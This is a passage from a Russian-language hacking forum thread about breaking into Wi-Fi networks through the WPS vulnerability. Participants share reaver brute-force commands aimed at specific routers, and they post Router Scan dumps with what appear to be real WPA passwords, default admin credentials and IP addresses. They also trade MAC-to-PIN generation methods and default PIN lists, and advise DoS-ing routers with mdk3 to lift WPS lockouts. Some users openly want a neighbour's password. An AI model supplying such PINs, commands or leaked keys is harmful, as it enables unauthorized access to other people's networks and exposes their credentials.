Просмотр полной версии : Уязвимость в протоколе Wi-Fi Protected Setup
Страницы :
1
2
3
4
5
6
7
8
9
[
10]
11
12
13
14
15
16
17
18
19
20
С этим помочь не могу.
А с предыдущим попробуйте:
reaver -i mon0 -b 34:08:04C:5A:18 -vv -p4440984 -n -L
Сегодня роутер включил wps. После блокировки две последних цифры мака изменились, вместо 34:08:04C:5A:18 стало 34:08:04C:5A:F8 (раньше не обращал внимание). Сгенерировал новый пин, ввёл команду выше, а результат всё тот же: пин успешно подошёл, а строки с паролем нет... Какие ещё есть мысли по этому роутеру?
подключиться с помощью пин-кода средствами винды или телефона с андроидом. а там уже подглянуть пароль в веб морде. это если пин-код действительно подходит.
подключиться с помощью пин-кода средствами винды или телефона с андроидом. а там уже подглянуть пароль в веб морде. это если пин-код действительно подходит.
А как узнать подходит или нет? Полный перебор останавливается на этом пине, типа успешно завершено. Но по нему не подключает к данной ТД.
henri2002
27.12.2014, 01:10
А как узнать подходит или нет? Полный перебор останавливается на этом пине, типа успешно завершено. Но по нему не подключает к данной ТД.
логи ривера выставите.
логи ривера выставите.
Выставлял уже:
https://www.sendspace.com/file/q0cr31
в 5 раз прогонять заново не вижу смысла.
binarymaster
27.12.2014, 01:34
to binarymaster
Huawei EchoLife HG532e в программке не определяется (24bit HEX->DEC)
Добавил OUI-шки.
Пост вот тут (чтобы не искать).
есть asus rt-n12 c1
bssid:50:46:5D:61:C1:58
известный pin:42805878
к соожалению,метод не сработал...хотя,может так только в моем случае
Как уже выяснилось, в большинстве случаев этот алгоритм используется на ASUS RT-N13U Rev.B1
Но надо будет ещё посмотреть.
А вот есть ли какой-то список маков всех роутеров которые используют генерацию пина по методу 16>10 ?
В генераторе пинов я назвал этот алгоритм NIC-24.
В генераторе пинов я назвал этот алгоритм NIC-24.
С TP-Link'ами я так понял пока засада? А что насчёт роутеров ZTE (их клон Промсвязь) ? У нас их много встречается у абонентов byfly.
binarymaster
27.12.2014, 04:33
С TP-Link'ами я так понял пока засада?
Пока да.
А что насчёт роутеров ZTE (их клон Промсвязь) ? У нас их много встречается у абонентов byfly.
Если речь идёт о роутере "Промсвязь M-200 A", то он использует прошивку ZyNOS, там свои особенности пин кода.
Прошивка поддерживается Router Scan'ом, если есть возможность, соберите хорошую выборку из этих роутеров, чтобы можно было проанализировать.
Address: http://10.59.2.121:8080/
Time: 16 ms
Authorization: admin:admin
Device: Sercomm Beeline Smart Box S1000
BSSID: D4:21:22:0B:A8:F8
ESSID: Smart_box-Fast
Security type: WPA/WPA2
Key: Fast7137767
WPS Pin: 12996209
LAN IP: 192.168.1.1
LAN Subnet Mask: 255.255.255.0
WAN IP: 10.59.2.121
WAN Gateway: 10.59.0.1
Domain Name Servers: 85.21.192.3 213.234.192.8
странно,в одном порт 80,в другом 8080,хотя роутер один и тот же
http://i66.fastpic.ru/big/2014/1228/6a/9af42ce84e00a857657057c7e884fd6a.png
binarymaster
28.12.2014, 16:25
странно,в одном порт 80,в другом 8080,хотя роутер один и тот же
Просто он слушает 2 порта одновременно, такое бывает.
вот еще один,здесь bssid с 00:0e:8f начинается
Address: http://10.59.73.176/
Time: 15 ms
Authorization: admin:admin
Device: Sercomm Beeline Smart Box S1000
BSSID: 00:0E:8F:06:BC:A6
ESSID: Saloem
Security type: WPA/WPA2
Key: 7175491qwe
WPS Pin: 23397705
LAN IP: 192.168.1.1
LAN Subnet Mask: 255.255.255.0
WAN IP: 10.59.73.176
WAN Gateway: 10.59.72.1
Domain Name Servers: 213.234.192.8 85.21.192.3
Sitronik
28.12.2014, 19:27
Пока да.
Если речь идёт о роутере "Промсвязь M-200 A", то он использует прошивку ZyNOS, там свои особенности пин кода.
Прошивка поддерживается Router Scan'ом, если есть возможность, соберите хорошую выборку из этих роутеров, чтобы можно было проанализировать.
Меня тоже интересует этот вопрос, потому что ни одна точка "ZTE от Укртелекома" не поддается взлому по wps сразу в блок идут, помогите пожалуйста узнать метод генерации пин-кодов. Сделал выборку по роутерам ZTE крупного провайдера Укртелеком.
ZTE.xls
у модемов zte от укртелекома впс как такового на родной прошивке нет. там работает только кнопка, один человек уже проверял, покупал этот роутер и долбил его ривером. Если бы кто развертел алгоритм создания стандартного пароля, вот это было бы интереснее, тем более жопой чувствую, что в прошивке можно найти много чего интересного
binarymaster
28.12.2014, 22:24
вот еще один,здесь bssid с 00:0e:8f начинается
ESSID: Saloem
Поднять репу пока не получается, спасибо за точку
http://rghost.ru/60026941/thumb.png
http://rghost.ru/60026941/thumb.png
сосед,вот уж не думал из бутово здесь кого-нибудь встречу
binarymaster
29.12.2014, 00:05
Мир так тесен
VladimirV
29.12.2014, 00:14
nic->24
Самые последнии!
http://rghost.ru/private/60028972/c61036f3b4ffacdb0cb237fd21a761b7
Еще нашол много статики. Позже выложу.
binarymaster
29.12.2014, 00:41
На будущее:
Подписывай, какой мак-адрес соответствует какой модели, а то не всегда очевидно...
А так, плюс)
VladimirV
29.12.2014, 11:43
Вот собрал все (в конце файла):
http://rghost.ru/private/60034011/a147815be273a11786a09e007f579ab8
P.S. Если модели нет - Значит это не роутерскан а я через reaver подобрал.
Вот собрал все (в конце файла):
http://rghost.ru/private/60034011/a147815be273a11786a09e007f579ab8
P.S. Если модели нет - Значит это не роутерскан а я через reaver подобрал.
//24 ================== раскидано все и кажись много повторов.
VladimirV
29.12.2014, 14:36
//24 ================== раскидано все и кажись много повторов.
То так задумано Это две колонки таблицы.
Актуально ALL.
Для алгоритмов 24, 28, 32 если совпала первая половина пина значит алгоритм правильный (роутерскан в некоторых роутерах не правильно парсит последний байт BSSID) в жывую все OK.
binarymaster
29.12.2014, 17:28
Вот собрал все (в конце файла):
http://rghost.ru/private/60034011/a147815be273a11786a09e007f579ab8
P.S. Если модели нет - Значит это не роутерскан а я через reaver подобрал.
В файле:
50:46:5D:12:XX:XX 32B BinaryMaster
Хм... я не патчу роутеры
VladimirV
29.12.2014, 17:34
В файле:
50:46:5D:12:XX:XX 32B BinaryMaster
Хм... я не патчу роутеры
Это я записывал и забыл удалить
Sitronik
29.12.2014, 20:50
у модемов zte от укртелекома впс как такового на родной прошивке нет. там работает только кнопка, один человек уже проверял, покупал этот роутер и долбил его ривером. Если бы кто развертел алгоритм создания стандартного пароля, вот это было бы интереснее, тем более жопой чувствую, что в прошивке можно найти много чего интересного
Жаль конечно что впс там не работает вся надежда на ачат )) Может выложить прошивку пусть кто хорошо разбирается глянет, вдруг решат эту проблемку?
VladimirV
29.12.2014, 22:08
Жаль конечно что впс там не работает вся надежда на ачат )) Может выложить прошивку пусть кто хорошо разбирается глянет, вдруг решат эту проблемку?
Можно в личку. Глянем.
ESSID: ZTE018
BSSID: CC:7B:35:15:F5:78
лог ривера:
https://www.sendspace.com/file/chj9yk
Несколько раз делал полный перебор, где-то в начале, но с разных мест, показывает прогресс 90%, потом доходит до 99,99% и так по кругу гоняет один пин... С этим можно что-нибудь сделать чтобы вытянуть пароль?
Нашёлся ещё один роутер который ведёт себя аналогичным образом, мак-адреса у них совпадают:
ESSID: ZTE154
BSSID: CC:7B:35:15:40:5C
может у кого будут предложения?
Нашёлся ещё один роутер который ведёт себя аналогичным образом, мак-адреса у них совпадают:
ESSID: ZTE154
BSSID: CC:7B:35:15:40:5C
может у кого будут предложения?
У этих новых zte pin не вычислишь.
У этих новых zte pin не вычислишь.
Как хотя бы их взломать по wps?
А у них вообще пин-код есть?
А у них вообще пин-код есть?
Перебор идёт, но ривер гоняет один пин по кругу на 99,99%, причём с каждого нового перебора спотыкается в разных местах
Я имею в виду, у роутеров видно пин-код в веб-интерфейсе виден, и есть ли поддержка по пинку в прошивке. Возможно, с этими роутерами такая же песня, как и с укртелекомовскими гривневыми модемами.
Я имею в виду, у роутеров видно пин-код в веб-интерфейсе виден, и есть ли поддержка по пинку в прошивке. Возможно, с этими роутерами такая же песня, как и с укртелекомовскими гривневыми модемами.
Хз. У меня таких три штуки рядом и ни один не удалось сломать брутом по словарю чтобы зайти и слить прошивку... При переборе wps он ещё постоянно выдаёт Warning: Receive timeout occurred хотя сигнал там просто отличный. Скрин:
http://images.vfl.ru/ii/1419960416/8dc0a4d9/7337890_s.png
Warning: Receive timeout occurred
Ну это у меня постоянно при переборе выбивает, походу так и должно быть. При этом пин-код успешно подбирается, перебор идет.
пысы посмотри прогой dumpper, что там за роутер, возможно удастся найти дамп флешки.
Ну это у меня постоянно при переборе выбивает, походу так и должно быть. При этом пин-код успешно подбирается, перебор идет.
пысы посмотри прогой dumpper, что там за роутер, возможно удастся найти дамп флешки.
Кроме версии WPS 1.0 больше ничего не показывает...
Погуглил. Из тех роутеров которые использует byfly есть две модели с именем ZTE в названии:
ZTE ZXV10 W300 и Промсвязь ZTE ZXHN H208N
видимо в сторону этих двух моделей и нужно копать...
В веб морде этих модемов нет ни слова об wps, значит и по пину не подключиться к ним. С нашими модемами та же история.
Да точно CC:7B:35:15 это ZXHN H208N, wps у него не видно
Свежая версия прошивки от них лежит здесь:
http://fw.byfly.me/ims/zxhn-h208n/
а кто подскажет как из этого роутера выдернуть его ром?
как из этого роутера выдернуть его ром?
Берешь паяло, выпаиваешь из модема микросхему флеш-памяти, делаешь самопальный программатор, и выдергиваешь из него инфу, все просто)
Берешь паяло, выпаиваешь из модема микросхему флеш-памяти, делаешь самопальный программатор, и выдергиваешь из него инфу, все просто)
Да, точно А через веб-интерфейс никак?
Никак. Иногда можно по кускам вычитать память через телнет, но это очень редко где есть.
Можно спросить на форумах мастеров по бытовой технике, чтобы те слили дамп флешки.
binarymaster
31.12.2014, 01:03
nvram show
cat /dev/mtd0
cat /dev/mtd1
cat /dev/mtd2
cat /dev/mtd3
Или какие там ещё варианты...
PSYDRUGS
04.01.2015, 14:51
Удалось узнать дефолтный пин для роутера Beeline Smart Box, c MAC: адресом 00:0E:8F:6E:1F:26, это 26129273.
В роутерах ASUS возможно вычислить PIN? С таким MAC: AC:9E:17:30:7B:20, модель RT-N14, лочиться после одной попытки на ~ 300 секунд,
потом отвисает, перебор возможен, но очень долго. И ещё один MAC: 14A:E9:BA:37:94, без понятия что это ASUS или TP-LINK.
VladimirV
07.01.2015, 03:22
И ещё один MAC: 14A:E9:BA:37:94, без понятия что это ASUS или TP-LINK.
ASUS RT-G32
Уже здесь упоминали мак 64:66:В3:ХХ:ХХ:ХХ
помогите с пином к Tp-Link
64:66:B3:46:23:12
VladimirV
08.01.2015, 01:05
Уже здесь упоминали мак 64:66:В3:ХХ:ХХ:ХХ
помогите с пином к Tp-Link
64:66:B3:46:23:12
ZyNOS ADSL (TD-W8961ND)
elepol61
08.01.2015, 01:46
Уже здесь упоминали мак 64:66:В3:ХХ:ХХ:ХХ
помогите с пином к Tp-Link
64:66:B3:46:23:12
WPS PIN: 45964985
Sitronik
08.01.2015, 02:40
WPS PIN: 45964985
Как узнать пин от TP-LINK с похожим маком?
elepol61
08.01.2015, 09:16
Как узнать пин от TP-LINK с похожим маком?
- для TP-LINK никак, это всего лишь вероятность что такой пин может подойти полученный при переводе последних шести символов мака из hex в dec.
- дли Zyxel почти всегда такой метод подходит.
Сейчас попробовал на одном подопечном типилинке. Метод работает, но с маленьким нюансом: при переводе последних 6 символов МАС-а в DEC получилось 9789708, а в роутере дефолтный пин 97897088 - один знак в конце отличия, но вцелом, можно говорить о том, что метод рабочий. Для ривера и роутеров, уходящих в лок поле 10 переборов - исключительно замечательный вариант - ввести известные символы, надеяться, что за 10 попыток ривер выведает недостающий и сдаст WPA ключ.
P.S. На 3-х других не прокатило Жаль. Прросто совпало, а может, от процессора зависит. Не знаю.
elepol61
08.01.2015, 13:24
Сейчас попробовал на одном подопечном типилинке. Метод работает, но с маленьким нюансом: при переводе последних 6 символов МАС-а в DEC получилось 9789708, а в роутере дефолтный пин 97897088 - один знак в конце отличия, но вцелом, можно говорить о том, что метод рабочий. Для ривера и роутеров, уходящих в лок поле 10 переборов - исключительно замечательный вариант - ввести известные символы, надеяться, что за 10 попыток ривер выведает недостающий и сдаст WPA ключ.
P.S. На 3-х других не прокатило Жаль. Прросто совпало, а может, от процессора зависит. Не знаю.
- последняя восьмая цифра в пин коде называется - контрольная сумма, она как раз в твоём случае и равняется 8.
- повезло, конечно пробовать надо может и прокатит.
Vikhedgehog
08.01.2015, 13:27
Сейчас попробовал на одном подопечном типилинке. Метод работает, но с маленьким нюансом: при переводе последних 6 символов МАС-а в DEC получилось 9789708, а в роутере дефолтный пин 97897088 - один знак в конце отличия, но вцелом, можно говорить о том, что метод рабочий. Для ривера и роутеров, уходящих в лок поле 10 переборов - исключительно замечательный вариант - ввести известные символы, надеяться, что за 10 попыток ривер выведает недостающий и сдаст WPA ключ.
P.S. На 3-х других не прокатило Жаль. Прросто совпало, а может, от процессора зависит. Не знаю.
Этот способ работает только на роутерах ADSL от TP-LINK, которых в России очень мало.
- последняя восьмая цифра в пин коде называется - контрольная сумма, она как раз в твоём случае и равняется 8.
- повезло, конечно пробовать надо может и прокатит.
А как она вычисляется?
binarymaster
08.01.2015, 15:50
А как она вычисляется?
function wps_pin_checksum(pin)
{
var accum = 0;
while (pin) {
accum += 3 * (pin % 10);
pin /= 10;
pin = Math.floor(pin);
accum += pin % 10;
pin /= 10;
pin = Math.floor(pin);
}
return (10 - accum % 10) % 10;
}
Т.е. простенький скриптик на С скомпилить и исполнить?
binarymaster
08.01.2015, 16:50
Эта функция вычисляет последнее число (контрольную сумму) из исходного пин кода. И она в общем-то не сложная. В reaver последнее число пин кода можно не подставлять, он сам вычисляет.
chingizbel
09.01.2015, 21:55
1. Скажите у роутеров ROSTELECOMа есть алгоритм для пинов или как там дела обстоят ?
2. Если это возможно , то для анализа сколько нужно насобирать роутеров количество, 2-3к или больше ?
Роутерскан их находит
VladimirV
09.01.2015, 23:00
1. Скажите у роутеров ROSTELECOMа есть алгоритм для пинов или как там дела обстоят ?
2. Если это возможно , то для анализа сколько нужно насобирать роутеров количество, 2-3к или больше ?
Роутерскан их находит
У ROSTELECOMа зависит от модели роутера. Есть постоянные пины и 24bit->Hex->Dec
Вот те что мне извесны:
00:1A:A9:B4:XX:XX 1562469 =1562469 Micro DSL (AR800 | V1.5)
00:1A:A9:C9:XX:XX 2017252 =2017252 Micro DSL (AR800 | V1.5)
00:1A:A9:B9:XX:XX 1708421 =1708421 Micro DSL (AR800 | V1.5)
7C:03:4C:CB:XX:XX 1110582 =1110582 Micro DSL (F@ST3804R | 7.126 F3804R RTC)
00:1A:A9:CA:XX:XX 1881172 =1881172 Micro DSL (AR800 | V1.5)
00:1A:A9:B7:XX:XX 2017252 =2017252 Micro DSL (AR800 | V1.5)
00:1F:CE:58:XX:XX 1883648 =1883648 Micro DSL (96328A-1341N1 | A731-406QTH-C01 R06.A2pD033.d23e)
00:1F:CE:47:XX:XX 1562469 =1562469 Micro DSL (96328A-1341N1 | A731-406QTH-C01 R05.A2pD033.d23e)
14:14:4B:0D:XX:XX 1416980 =1416980 Micro DSL (AR800 | V1.5)
00:1F:CE:56:XX:XX 1562469 =1562469 Micro DSL (96328A-1341N1 | A731-406QTH-C01 R06.A2pD033.d23e)
14:14:4B:8B:XX:XX 1881172 =1881172 Micro DSL (AR800 | V2.5)
14:A9:E3:03:XX:XX 0224296 24B ROSTELECOM RT-V4L1USBn, NDMS v1.10(0637)01RU
EC:43:F6:09:XX:XX 0632576 24B Rostelecom 1W4L1USBn, NDMS v2.00(AABV.5)A5-31-5779231
chingizbel
09.01.2015, 23:31
VladimirV
Поглядел я на ваши МАКи , но не знаю что за роутеры эти.
Возможно вы меня не поняли, я имел ввиду роутеры меня интересуют такие :
18:62:2C:FB:9E:B5 ROSTELECOM_9EB4
18:62:2C:FB:81:67 ROSTELECOM_8166
18:62:2C:FC:0F:AC ROSTELECOM_0FAB
68:15:90:4E:1A:57 ROSTELECOM_1A56
68:15:90:4C:8B:CE ROSTELECOM_8BCD
34:8A:AE:13:56:22 ROSTELECOM_5621
34:8A:AE:13:4F:8F ROSTELECOM_4F8E
F0:82:61:4C:BD:15 ROSTELECOM_BD14
F0:82:61:22:BB:5B ROSTELECOM_BB5A
2C:39:96:A9:A5:94 ROSTELECOM_A593
2C:39:96:99:4B:51 ROSTELECOM_4B50
и т.д
Меня интересует мак 68:15:90 т.к у соседа такой роутер , а пасс не знаю (
Сегодня начал собирать базу что роутерскан находит, потом выложу как подкоплю
Подскажите пин на F8:1A:67:7E:F6:9A
Сбой реавера или смена пароля
Вообщем читал я что писали тут форумчане по поводу остановки на 99.99% и у меня оказался довольно интересный случай,вообщем реавер по началу затупил на пинкоде 99985677 вот было 90.0% я попробовал заного перебрать вторую часть теперь он остановился на 99.9% с пинкодом 99989989 и все,поменял 8 на 9 в первой части пароля и сного подбираю 2 часть,как только начал её подбирать увидел что все опять с 90.0% началось....что делать то? Могли ли сменить пароль на точке во время моего перебора??
Могли ли сменить пароль на точке во время моего перебора??
Речь о пине, а не о пароле. Да, могли сменить пин, но вероятность очень небольшая. Например на устройствах tp-link можно менять пин, но какое там устройство у вас - неизвестно.
...что делать то?
Скорее всего ривер пропустил правильную первую часть пина (первые 4 цифры). Такое бывает когда точка плохо отвечает и ривер ее не понимает. Может это такой вид защиты, но скорее всего просто точка глючно работает. Нужно пробовать снова или пробовать утилиту bully вместо ривер. Например для trendnet, мне кажется, bully лучше подходит.
Речь о пине, а не о пароле. Да, могли сменить пин, но вероятность очень небольшая. Например на устройствах tp-link можно менять пин, но какое там устройство у вас - неизвестно.
Скорее всего ривер пропустил правильную первую часть пина (первые 4 цифры). Такое бывает когда точка плохо отвечает и ривер ее не понимает. Может это такой вид защиты, но скорее всего просто точка глючно работает. Нужно пробовать снова или пробовать утилиту bully вместо ривер. Например для trendnet, мне кажется, bully лучше подходит.
Мне тоже не ясно что за роутер...но только что поменяв цифру в первой части нифига не поменялось теперь ривер завис на коде 99999988....вообщем очень печально что придется все заного подбирать,попробую еще я ваши утилиты,возможно они что изменят))
Еще интересует такой вопрос,у меня имеются 3 точки которые я когда то ломал и они мне дали баны(wps locked Yes) вот можно ли от этого как то избавится,разблокировать эту точку,читал просто на американских форумах по поводу утилиты revdk и ручного метода снятия такого бана,суть способа заключается в том что бы задосить точку и сделать так что бы она перезагрузилась....но толком я мало чего понял и хотелось бы узнать,правда или нет?
sergeich
11.01.2015, 19:40
Подскажите пин на F8:1A:67:7E:F6:9A
[+] WPS pin might be : 83206665
Отпиши подошел ли.
sergeich
11.01.2015, 19:43
Еще интересует такой вопрос,у меня имеются 3 точки которые я когда то ломал и они мне дали баны(wps locked Yes) вот можно ли от этого как то избавится,разблокировать эту точку,читал просто на американских форумах по поводу утилиты revdk и ручного метода снятия такого бана,суть способа заключается в том что бы задосить точку и сделать так что бы она перезагрузилась....но толком я мало чего понял и хотелось бы узнать,правда или нет?
А если просто MAC адрес твоего wi-fi адаптера поменять?
[+] WPS pin might be : 83206665
Отпиши подошел ли.
Точка пока пропала из виду
Есть похожая. Судя по всему таже модель
F8:1A:67:59:63:B0
PIN 24727440
Пин 100%, вычислял 2 дня.
Проверьте плиз ваш метод на той точке что я давал ранее.
А если просто MAC адрес твоего wi-fi адаптера поменять?
Незнаю....непробовал)) просто я этот способ изначально знал,догадывался по поводу смены mac но это безсмысленно) потому что точка банит не мой мак а банит подключение по wps так что с какого мака ты бы не подключался в любом случаее будет бан,раньше я сталкивался с баном,но не стаким жестоким(вечность) вот и решил узнать может кто пробовал попытатся сломать wps lock ну илм использовал метод американцев: http://m.youtube.com/watch?v=hHVPSJn4Fqo
Ну или использовал Revdk...просто она у меня не пошла а вручную какой то бред выходит)
Есть похожая. Судя по всему та же модель
Тоже есть похожие
f8:1a:67:64:c8:2a - 21255571
f8:1a:67:75:2a:7a - 65394298
f8:1a:67:80:ca:2e - 69001420
f8:1a:67:e0:80:2a - 17004633
Пины рабочие, получены из веб-морд роутера.
Поломал я сеть...оказался это UR-325BN компании Upvel,пароль сети оказался просто крутым:z7staE2H ну а пинкод 20854836 подобрался очень быстро,сначало до 10% а потом резкий прыжок до 90% и после 2 часть за 30 мин подобрал,все таки ривер пропустил один или более пакет(ов)
Но вопрос по поводу Wps Lock остается в силе
Вездесущий
12.01.2015, 02:17
У меня тоже некоторые точки идут в бан, но после отключения света или с определенным интервалом времени некоторые "регенерируются" и поехали ривером дальше... а некоторые так и до сии висят вялятся, вот как их снять хотя-бы с пином... кстати на некоторых которые вкусно пахнут есть хэндшейк... А вот как убрать Wps Lock досихпор загадка
VladimirV
12.01.2015, 02:33
Поломал я сеть...оказался это UR-325BN компании Upvel,пароль сети оказался просто крутым:z7staE2H ну а пинкод 20854836 подобрался очень быстро,сначало до 10% а потом резкий прыжок до 90% и после 2 часть за 30 мин подобрал,все таки ривер пропустил один или более пакет(ов)
Но вопрос по поводу Wps Lock остается в силе
Это один из постоянных пинов для:
Upvel UR-315BN Wireless Router
Upvel UR-325BN Wireless Router
Думаю если Вы спросили пин к маку то Вам его подсказали.
Это один из постоянных пинов для:
Upvel UR-315BN Wireless Router
Upvel UR-325BN Wireless Router
Думаю если Вы спросили пин к маку то Вам его подсказали.
Причем тут мак и пин?)
Почитайте мои пост еще раз,разве я написал что я взял и спросил у кого то?))) Мрак))))
Wirexia
Да, возможно VladimirV выразился недостаточно четко для вас. И я слишком мягко интересовался, какое у вас там устройство. Если бы вы сообщили первую половину его мак-адреса (так называемую OUI), то многие бы вам тут ответили, какой пин пробовать.
http://forum.antichat.ru/showthread.php?p=3758902-20854836#post3758902
Но вы самостоятельно нашли этот известный пин. Ведь мог бы быть и не он.
Wirexia
Да, возможно VladimirV выразился недостаточно четко для вас. И я слишком мягко интересовался, какое у вас там устройство. Если бы вы сообщили первую половину его мак-адреса (так называемую OUI), то многие бы вам тут ответили, какой пин пробовать.
http://forum.antichat.ru/showthread.php?p=3758902-20854836#post3758902
Но вы самостоятельно нашли этот известный пин. Ведь мог бы быть и не он.
Мрак,а что то по моему вопросу с WPS locked yes у вас есть?)
Мрак,а что то по моему вопросу с WPS locked yes у вас есть?)
Если устройства от tp-link, то на некоторых из них можно принудительно перегружать wi-fi модуль (т.е. сбрасывать lock) с помощью mdk3. Не на всех получится, но известны мак-адреса, на которых получалось. Устройства других производителей на mdk3 не реагируют или просто еще не найдены. У некоторых lock временный, у некоторых до перезагрузки. На некоторых устройствах чтобы избежать залочивания, нужно пробовать пин не чаще чем раз в 60 секунд. Задавая вопрос, очень желательно указывать производителя устройства или давать первую половину мак-адреса (OUI). По ней легко узнать производителя, например тут: https://www.wireshark.org/tools/oui-lookup.html
Если устройства от tp-link, то на некоторых из них можно принудительно перегружать wi-fi модуль (т.е. сбрасывать lock) с помощью mdk3. Не на всех получится, но известны мак-адреса, на которых получалось. Устройства других производителей на mdk3 не реагируют или просто еще не найдены. У некоторых lock временный, у некоторых до перезагрузки. На некоторых устройствах чтобы избежать залочивания, нужно пробовать пин не чаще чем раз в 60 секунд. Задавая вопрос, очень желательно указывать производителя устройства или давать первую половину мак-адреса (OUI). По ней легко узнать производителя, например тут: https://www.wireshark.org/tools/oui-lookup.html
E8:94:F6:73:3E:E2 alert_5 (wps locked) (Results
E8:94:F6 TP-LINK TECHNOLOGIES CO.,LTD.)
CO:4A:00:49:A5:06 Tp-Link 1043 (wps locked)
CO:4A:00:5F:88:86 DOMA (wps locked )
Очень бы был признателен вам если подскажите пин или метод снятия wps лока)
Из трех мак адресо только первый я нашел что он тп линк...и то незнаю правильно или нет...
Буквы О в мак-адресе быть не может, правильно C0:4A:00
У tp-link пины без системы - никто не подскажет (возможно очень давно все же была система, потому встречается крайне редко).
А для снятия лока и подбора нужно запускать скрипт.
Текст скрипта немного раличается в зависимости от того, какой сборкой Linux вы пользуетесь. Наиболее популярные wifislax и Kali. Для них в этой ветке ранее приводились тексты скриптов - можно найти, в крайнем случае кто-нибудь повторит, подскажи название сборки.
Буквы О в мак-адресе быть не может, правильно C0:4A:00
У tp-link пины без системы - никто не подскажет (возможно очень давно все же была система, потому встречается крайне редко).
А для снятия лока и подбора нужно запускать скрипт.
Текст скрипта немного раличается в зависимости от того, какой сборкой Linux вы пользуетесь. Наиболее популярные wifislax и Kali. Для них в этой ветке ранее приводились тексты скриптов - можно найти, в крайнем случае кто-нибудь повторит, подскажи название сборки.
у меня backtrack5 r3 пробовал я md3 долбить эти три точки) пользовался командой md3 интерфейс(использовал mon0,1,2) x 0 -t bssid -n essid -s 500 (по началу 200 использовал)
Исправил и узнал что это все 3 тп линка
E8:94:F6:73:3E:E2 alert_5 (wps locked) (Results
E8:94:F6 TP-LINK TECHNOLOGIES CO.,LTD.)
C0:4A:00:49:A5:06 Tp-Link 1043 (wps locked) TP-Link
C0:4A:00:5F:88:86 DOMA (wps locked ) Tp-Link
а вот модели незнаю да и сама база незнает)
По ссылке сообщение с двумя скриптами. Первый для wifislax, второй для kali (бывший BackTrack). Чем чётче будут вопросы, тем чётче могут быть ответы. У меня был опыт только в wifislax.
http://forum.antichat.ru/showpost.php?p=3760910&postcount=2082
По ссылке сообщение с двумя скриптами. Первый для wifislax, второй для kali (бывший BackTrack). Чем чётче будут вопросы, тем чётче могут быть ответы. У меня был опыт только в wifislax.
http://forum.antichat.ru/showpost.php?p=3760910&postcount=2082
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Restored previous session
[+] Waiting for beacon from E8:94:F6:73:3E:E2
[+] Switching mon0 to channel 3
[+] Associated with E8:94:F6:73:3E:E2 (ESSID: alert_5)
[+] Trying pin 88885674
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 3
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 88885674
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 88885674
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 88885674
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
^C
[+] Session saved.
[+] Mdk3 is working ...
[+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C]
уже 6 раз перезапускал на ctrl+c и ничего
И не будет, этот скрипт не берет тп-линк. Точка тупо залочилась, жди денек, потом можно ещё 10 пинов перебрать(
И не будет, этот скрипт не берет тп-линк. Точка тупо залочилась, жди денек, потом можно ещё 10 пинов перебрать(
Так в том то и дело что она меня забанила на всегда,хотя после того как пробовал этот скрипт вроде пошел подбор и потом уже когда во второй раз все заглохло....
У тп-линков есть такая тема, что после лока можно перебрать ещё 8 пинов, после чего можно отдыхать.
PSYDRUGS
13.01.2015, 22:58
А к ASUS скрипт подойдёт? Уходят в блок на 300-600 сек, в зависимости от модели.
Может есть методика генерации по MAC адресу, или это затея безсмысленна?
Wirexia
Судя по откликам ривера, он не может связаться с точкой. Нет сообщений о блокировке. Сделайте вот что: посмотрите на каком канале точка, запустите отдельно mdk3 с параметрами из скрипта на 15 секунд, остановите, подождите секунд 30 и снова посмотрите на каком канале работает точка. При успешной перезагрузке wi-fi модуля точка как правило меняет канал.
Возможно в Backtrack старая версия mdk3. А возможно эта модель/прошивка не реагирует на mdk3. У меня был успешный опыт на wifislax версий 4.7 и 4.8. Еще может зависеть от драйвера для wi-fi адаптера. Какой он в BackTrack свежести надо смотреть. Кстати адаптер у меня alfa awus036h. От самого адаптера может и не зависит, а вот адаптер+драйвер уже больше вариаций.
А еще лог похож на слабую связь с точкой или на наличие помех.
асус ещё божеские роутеры, можно и подождать. Если есть желание, можешь проверить сам, работает или нет. Методика есть к очень старым роутерам.
Vikhedgehog
14.01.2015, 00:32
асус ещё божеские роутеры, можно и подождать. Если есть желание, можешь проверить сам, работает или нет. Методика есть к очень старым роутерам.
Божеские? Это по-моему единственные роутеры с высокой защитой. Тут есть асус трехлетней давности, у которого локи увеличиваются в геометрической прогрессии (чем больше неправильных пинов тем дольше ждать перед следующей попыткой). А новые вообще отключают WPS навсегда (даже после ребута не включается). У TP-LINK высокий шанс, что ДОС сработает если роутер TL-WR841N/D с началом мак адреса F8:1A:67, 10:FE:ED или C0:4A:00, которые встречаются очень часто. По умолчанию стоит 8-циферный ключ, а прога генерирует пароль который тоже легко подбирается. Еще заметил что на новых TP-LINK'ах иногда встречается WEP шифрование!! Уже видел 3-4 штуки точно!
Wirexia
Судя по откликам ривера, он не может связаться с точкой. Нет сообщений о блокировке. Сделайте вот что: посмотрите на каком канале точка, запустите отдельно mdk3 с параметрами из скрипта на 15 секунд, остановите, подождите секунд 30 и снова посмотрите на каком канале работает точка. При успешной перезагрузке wi-fi модуля точка как правило меняет канал.
